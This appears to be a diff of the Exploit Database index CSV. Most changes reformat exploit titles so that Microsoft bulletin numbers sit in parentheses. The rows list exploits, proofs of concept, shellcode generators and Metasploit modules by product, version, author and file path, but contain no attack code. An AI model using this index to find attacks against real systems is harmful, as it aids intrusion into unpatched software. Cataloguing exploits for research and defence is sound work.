12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
12258,platforms/windows/dos/12258.py,"Proof of Concept for MS10-006 SMB Client-Side Bug",2010-04-16,"laurent gaffie",windows,dos,0
12258,platforms/windows/dos/12258.py,"Windows - SMB Client-Side Bug Proof of Concept (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0
12259,platforms/php/dos/12259.php,"PHP 5.3.x DoS",2010-04-16,ITSecTeam,php,dos,0
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0
12261,platforms/windows/local/12261.rb,"Archive Searcher .zip Stack Overflow",2010-04-16,Lincoln,windows,local,0
@ -11400,7 +11400,7 @@ id,file,description,date,author,platform,type,port
12515,platforms/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution Vulnerability",2010-05-05,"Sn!pEr.S!Te Hacker",php,webapps,0
12516,platforms/windows/local/12516.py,"BaoFeng Storm M3U File Processing Buffer Overflow Exploit",2010-05-06,"Lufeng Li and Qingshan Li",windows,local,0
12517,platforms/php/webapps/12517.txt,"GetSimple 2.01 LFI",2010-05-06,Batch,php,webapps,0
12518,platforms/windows/dos/12518.pl,"Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005",2010-05-06,unsign,windows,dos,0
12518,platforms/windows/dos/12518.pl,"Microsoft Paint Integer Overflow Vulnerability (DoS) (MS10-005)",2010-05-06,unsign,windows,dos,0
12519,platforms/php/webapps/12519.txt,"AV Arcade Search Field XSS/HTML Injection",2010-05-06,"Vadim Toptunov",php,webapps,0
12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0
12521,platforms/php/webapps/12521.txt,"Factux LFI Vulnerability",2010-05-06,"ALTBTA ",php,webapps,0
@ -11727,7 +11727,6 @@ id,file,description,date,author,platform,type,port
13284,platforms/generator/shellcode/13284.txt,"/bin/sh Polymorphic shellcode with printable ASCII characters",2008-08-31,sorrow,generator,shellcode,0
13285,platforms/generator/shellcode/13285.c,"linux/x86 shellcode generator / null free",2008-08-19,BlackLight,generator,shellcode,0
13286,platforms/generator/shellcode/13286.c,"Alphanumeric Shellcode Encoder Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0
13287,platforms/generator/shellcode/13287.txt,"Download & Exec polymorphed shellcode Engine",2007-01-24,"YAG KOHHA",generator,shellcode,0
13288,platforms/generator/shellcode/13288.c,"Utility for generating HTTP/1.x requests for shellcodes",2006-10-22,izik,generator,shellcode,0
13289,platforms/generator/shellcode/13289.c,"Multi-Format Shellcode Encoding Tool - Beta 2.0 (w32)",2005-12-16,Skylined,generator,shellcode,0
13290,platforms/hardware/shellcode/13290.txt,"Version-independent IOS shellcode",2008-08-21,"Andy Davis",hardware,shellcode,0
@ -12618,7 +12617,7 @@ id,file,description,date,author,platform,type,port
14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0
14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0
14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0
14413,platforms/windows/dos/14413.txt,"IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0
14413,platforms/windows/dos/14413.txt,"Internet Explorer 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0
14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0
14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0
14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0
@ -12679,7 +12678,7 @@ id,file,description,date,author,platform,type,port
14481,platforms/php/webapps/14481.txt,"Joomla Component TTVideo 1.0 - SQL Injection Vulnerability",2010-07-27,"Salvatore Fresta",php,webapps,0
14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0
14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0
14484,platforms/windows/dos/14484.html,"IE6 / 7 Remote Dos vulnerability",2010-07-27,"Richard leahy",windows,dos,0
14484,platforms/windows/dos/14484.html,"Internet Explorer 6 / 7 Remote Dos vulnerability",2010-07-27,"Richard leahy",windows,dos,0
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0
14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability",2010-07-28,mywisdom,unix,remote,0
@ -13234,7 +13233,7 @@ id,file,description,date,author,platform,type,port
15262,platforms/windows/dos/15262.txt,"Microsoft Office HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0
15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service Vulnerability",2010-10-16,"MOHAMED ABDI",windows,dos,0
15264,platforms/aix/dos/15264.py,"PHP Hosting Directory 2.0 Database Disclosure Exploit (.py)",2010-10-16,ZoRLu,aix,dos,0
15265,platforms/asp/remote/15265.rb,"MS10-070 ASP.NET Padding Oracle File Download",2010-10-17,"Agustin Azubel",asp,remote,0
15265,platforms/asp/remote/15265.rb,"ASP.NET Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0
15266,platforms/windows/remote/15266.txt,"Windows NTLM Weak Nonce Vulnerability",2010-10-17,"Hernan Ochoa",windows,remote,0
15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite",2010-10-17,d0lc3,windows,dos,0
15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0
@ -13254,7 +13253,7 @@ id,file,description,date,author,platform,type,port
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0
15292,platforms/windows/remote/15292.rb,"MS10-070 ASP.NET Auto-Decryptor File Download Exploit",2010-10-20,"Agustin Azubel",windows,remote,0
15292,platforms/windows/remote/15292.rb,"ASP.NET Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0
15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0
15295,platforms/php/webapps/15295.html,"sNews CMS Multiple XSS Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps,0
15296,platforms/windows/remote/15296.txt,"Adobe Shockwave player rcsL chunk memory corruption 0day",2010-10-21,Abysssec,windows,remote,0
@ -13755,7 +13754,7 @@ id,file,description,date,author,platform,type,port
15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
15893,platforms/php/webapps/15893.py,"amoeba cms 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0
15894,platforms/windows/dos/15894.c,"MS10-073 Windows Class Handling Vulnerability",2011-01-02,"Tarjei Mandt",windows,dos,0
15894,platforms/windows/dos/15894.c,"Windows Class Handling Vulnerability (MS10-073)",2011-01-02,"Tarjei Mandt",windows,dos,0
15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
15896,platforms/php/webapps/15896.txt,"Sahana Agasti <= 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0
15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player Local Crash PoC",2011-01-03,c0d3R'Z,windows,dos,0
@ -13795,7 +13794,7 @@ id,file,description,date,author,platform,type,port
15960,platforms/php/webapps/15960.txt,"Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection Vulnerability",2011-01-10,Aodrulez,php,webapps,0
15962,platforms/solaris/local/15962.c,"LOCAL SOLARIS KERNEL ROOT EXPLOIT (< 5.10 138888-01)",2011-01-10,peri.carding,solaris,local,0
15963,platforms/windows/remote/15963.rb,"MS10-081: Windows Common Control Library (Comctl32) Heap Overflow",2011-01-10,"Nephi Johnson",windows,remote,0
15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 (calendar.php) SQL Injection Vulnerability",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0
15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0
@ -13809,8 +13808,8 @@ id,file,description,date,author,platform,type,port
15975,platforms/windows/local/15975.py,"Nokia Multimedia Player 1.0 SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0
15979,platforms/php/webapps/15979.txt,"Joomla! Spam Mail Relay Vulnerability",2011-01-12,"Jeff Channell",php,webapps,0
15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 HTTP Referer stored XSS",2011-01-12,"Saif El-Sherei",php,webapps,0
15984,platforms/windows/remote/15984.html,"MS11-002: Microsoft Data Access Components Vulnerability",2011-01-12,"Peter Vreugdenhil",windows,remote,0
15985,platforms/windows/local/15985.c,"MS10-073: Win32k Keyboard Layout Vulnerability",2011-01-13,"Ruben Santamarta ",windows,local,0
15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components Vulnerability (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0
15985,platforms/windows/local/15985.c,"Win32k - Keyboard Layout Vulnerability (MS10-073)",2011-01-13,"Ruben Santamarta ",windows,local,0
15986,platforms/windows/dos/15986.py,"Blackmoon FTP 3.1 Build 1735,1736 DoS",2011-01-13,"Craig Freyman",windows,dos,0
15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
15988,platforms/windows/dos/15988.py,"Objectivity/DB Lack of Authentication Remote Exploit",2011-01-14,"Jeremy Brown",windows,dos,0
@ -14137,11 +14136,11 @@ id,file,description,date,author,platform,type,port
16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)",2010-09-28,metasploit,windows,remote,0
16367,platforms/windows/remote/16367.rb,"Microsoft Server Service NetpwPathCanonicalize Overflow",2011-02-17,metasploit,windows,remote,0
16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",2010-07-03,metasploit,windows,remote,0
16369,platforms/windows/remote/16369.rb,"Microsoft Services MS06-066 nwwks.dll",2010-05-09,metasploit,windows,remote,0
16369,platforms/windows/remote/16369.rb,"Microsoft Services - nwwks.dll (MS06-066)",2010-05-09,metasploit,windows,remote,0
16370,platforms/windows/remote/16370.rb,"Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service Overflow",2010-07-03,metasploit,windows,remote,0
16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service NetpManageIPCConnect Overflow",2010-10-05,metasploit,windows,remote,0
16373,platforms/windows/remote/16373.rb,"Microsoft Services MS06-066 nwapi32.dll",2010-08-25,metasploit,windows,remote,0
16373,platforms/windows/remote/16373.rb,"Microsoft Services - nwapi32.dll (MS06-066)",2010-08-25,metasploit,windows,remote,0
16374,platforms/windows/remote/16374.rb,"Microsoft Windows Authenticated User Code Execution",2010-12-02,metasploit,windows,remote,0
16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service RASMAN Registry Overflow",2010-08-25,metasploit,windows,remote,0
16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",2010-11-24,metasploit,windows,remote,0
@ -14349,7 +14348,7 @@ id,file,description,date,author,platform,type,port
16578,platforms/windows/remote/16578.rb,"Internet Explorer createTextRange() Code Execution",2010-09-20,metasploit,windows,remote,0
16579,platforms/windows/remote/16579.rb,"Oracle Document Capture 10g ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16580,platforms/windows/remote/16580.rb,"HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16581,platforms/windows/remote/16581.rb,"MS03-020 Internet Explorer Object Type",2010-08-25,metasploit,windows,remote,0
16581,platforms/windows/remote/16581.rb,"Internet Explorer - Object Type (MS03-020)",2010-08-25,metasploit,windows,remote,0
16582,platforms/windows/remote/16582.rb,"Symantec BackupExec Calendar Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16583,platforms/windows/remote/16583.rb,"Internet Explorer Data Binding Memory Corruption",2010-09-20,metasploit,windows,remote,0
16584,platforms/windows/remote/16584.rb,"RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",2010-06-15,metasploit,windows,remote,0
@ -14588,7 +14587,7 @@ id,file,description,date,author,platform,type,port
16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server <= 5.0.6 - Buffer Overflow",2010-05-09,metasploit,windows,remote,2380
16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,metasploit,windows,remote,25
16819,platforms/windows/remote/16819.rb,"SoftiaCom WMailserver 1.0 - Buffer Overflow",2010-05-09,metasploit,windows,remote,25
16820,platforms/windows/remote/16820.rb,"MS03-046 Exchange 2000 XEXCH50 Heap Overflow",2010-11-11,metasploit,windows,remote,25
16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,metasploit,windows,remote,25
16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow",2010-06-22,metasploit,windows,remote,25
16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,metasploit,windows,remote,25
16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 LDAP Buffer Overflow",2010-11-14,metasploit,windows,remote,389
@ -14912,7 +14911,7 @@ id,file,description,date,author,platform,type,port
17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0
17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0
17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0
17177,platforms/windows/local/17177.rb,"MS Word - Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
17177,platforms/windows/local/17177.rb,"MS Word 2003 - Record Parsing Buffer Overflow (meta) (MS09-027)",2011-04-16,"Andrew King",windows,local,0
17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0
17179,platforms/php/webapps/17179.txt,"Bedder CMS Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0
17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0
@ -15095,7 +15094,7 @@ id,file,description,date,author,platform,type,port
17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 DoS Exploit",2011-06-16,"Soroush Dalili",windows,dos,0
17406,platforms/php/webapps/17406.txt,"Catalog Builder - Ecommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0
17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 persistent XSS via SQL Injection",2011-06-17,Saif,php,webapps,0
17409,platforms/windows/remote/17409.rb,"MS11-050 IE mshtml!CObjectElement Use After Free",2011-06-17,metasploit,windows,remote,0
17409,platforms/windows/remote/17409.rb,"Internet Explorer - mshtml!CObjectElement Use After Free (MS11-050)",2011-06-17,metasploit,windows,remote,0
17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0
17411,platforms/php/webapps/17411.txt,"A Cool Debate 1.0.3 Component Joomla Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0
17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) SQL Injection Vulnerability",2011-06-19,CoBRa_21,php,webapps,0
@ -15153,7 +15152,7 @@ id,file,description,date,author,platform,type,port
17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0
17474,platforms/windows/local/17474.txt,"MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0
17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053)",2011-07-03,"Myo Soe",windows,dos,0
17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0
17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0
17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
@ -15302,7 +15301,7 @@ id,file,description,date,author,platform,type,port
17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0
17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 Denial of Servive Exploit",2011-08-12,G13,windows,dos,0
17659,platforms/windows/remote/17659.rb,"MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",2011-08-13,metasploit,windows,remote,0
17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,metasploit,windows,remote,0
17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0
17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0
17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x (4.6.5) SQL Injection Vulnerability",2011-08-13,"Aung Khant",php,webapps,0
@ -15578,9 +15577,9 @@ id,file,description,date,author,platform,type,port
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0
17976,platforms/windows/remote/17976.rb,"Mozilla Firefox Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0
17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
17978,platforms/windows/dos/17978.txt,"MS11-077 .fon Kernel-Mode Buffer Overrun PoC",2011-10-13,"Byoungyoung Lee",windows,dos,0
17978,platforms/windows/dos/17978.txt,"Windows - .fon Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0
17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin <= 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0
17981,platforms/windows/dos/17981.py,"MS11-064 TCP/IP Stack Denial of Service",2011-10-15,"Byoungyoung Lee",windows,dos,0
17981,platforms/windows/dos/17981.py,"Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0
17982,platforms/windows/dos/17982.pl,"BlueZone Desktop .zap file Local Denial of Service Vulnerability",2011-10-15,Silent_Dream,windows,dos,0
17983,platforms/php/webapps/17983.txt,"Wordpress Plugin Photo Album Plus <= 4.1.1 - SQL Injection Vulnerability",2011-10-15,Skraps,php,webapps,0
17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0
@ -15619,7 +15618,7 @@ id,file,description,date,author,platform,type,port
18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0
18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0
18023,platforms/php/webapps/18023.java,"phpLDAPadmin 0.9.4b DoS",2011-10-23,Alguien,php,webapps,0
18024,platforms/windows/dos/18024.txt,"MS11-077 Win32k Null Pointer De-reference Vulnerability PoC",2011-10-23,KiDebug,windows,dos,0
18024,platforms/windows/dos/18024.txt,"Win32k Null Pointer De-reference Vulnerability PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0
18025,platforms/multiple/dos/18025.txt,"Google Chrome Denial of Service (DoS)",2011-10-23,"Prashant Uniyal",multiple,dos,0
18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",2011-10-24,metasploit,windows,local,0
18028,platforms/windows/dos/18028.py,"zFTP Server ""cwd/stat"" Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0
@ -15673,7 +15672,7 @@ id,file,description,date,author,platform,type,port
18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
18086,platforms/linux/local/18086.c,"Calibre E-Book Reader Local Root",2011-11-05,zx2c4,linux,local,0
18087,platforms/windows/local/18087.rb,"MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",2011-11-05,metasploit,windows,local,0
18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,metasploit,windows,local,0
18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0
18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow Exploit - DEP Bypass",2011-11-07,pasta,windows,remote,0
18090,platforms/php/webapps/18090.txt,"LabStoRe <= 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0
@ -15718,7 +15717,7 @@ id,file,description,date,author,platform,type,port
18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
18140,platforms/windows/dos/18140.txt,"win7 keylayout Blue Screen Vulnerability",2011-11-21,instruder,windows,dos,0
18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,metasploit,windows,local,0
18143,platforms/windows/local/18143.rb,"MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow",2011-11-22,metasploit,windows,local,0
18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,metasploit,windows,local,0
18145,platforms/linux/remote/18145.py,"Wireshark <= 1.4.4 , DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0
18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0
18148,platforms/php/webapps/18148.pl,"PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0
@ -15873,7 +15872,7 @@ id,file,description,date,author,platform,type,port
18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,bsd,remote,0
18370,platforms/multiple/dos/18370.txt,"php 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos,0
18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection",2012-01-14,"Marco Batista",php,webapps,0
18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability MS12-005",2012-01-14,"Byoungyoung Lee",windows,local,0
18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0
18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0
18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0
18375,platforms/windows/local/18375.rb,"BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)",2012-01-17,metasploit,windows,local,0
@ -15916,7 +15915,7 @@ id,file,description,date,author,platform,type,port
18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8& 2.9 - XSS/SQL Injections Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0
18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,metasploit,windows,remote,0
18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 ""proc_deutf()"" Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0
18426,platforms/windows/remote/18426.rb,"MS12-004 midiOutPlayNextPolyEvent Heap Overflow",2012-01-28,metasploit,windows,remote,0
18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,metasploit,windows,remote,0
18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0
18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection Vulnerability",2012-01-30,Dr.DaShEr,php,webapps,0
18429,platforms/php/webapps/18429.pl,"4images 1.7.6 - 9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0
@ -16095,7 +16094,7 @@ id,file,description,date,author,platform,type,port
18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 Remote SQL Injection and XSS Vulnerability",2012-03-21,LiquidWorm,php,webapps,0
18640,platforms/windows/remote/18640.txt,"Google Talk gtalk:// Deprecated Uri Handler Parameter Injection Vulnerability",2012-03-22,rgod,windows,remote,0
18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx sprintf Buffer Overflow Vulnerability",2012-03-22,rgod,windows,dos,0
18642,platforms/windows/remote/18642.rb,"MS10-002 Internet Explorer Object Memory Use-After-Free",2012-03-22,metasploit,windows,remote,0
18642,platforms/windows/remote/18642.rb,"Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,metasploit,windows,remote,0
18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 - Remote Buffer Overflow Vulnerability",2012-03-22,"Julien Ahrens",windows,dos,0
18644,platforms/php/webapps/18644.txt,"vBShout Persistent XSS",2012-03-22,ToiL,php,webapps,0
18646,platforms/hardware/webapps/18646.txt,"Cyberoam UTM Multiiple Vulnerabilities",2012-03-22,"Saurabh Harit",hardware,webapps,0
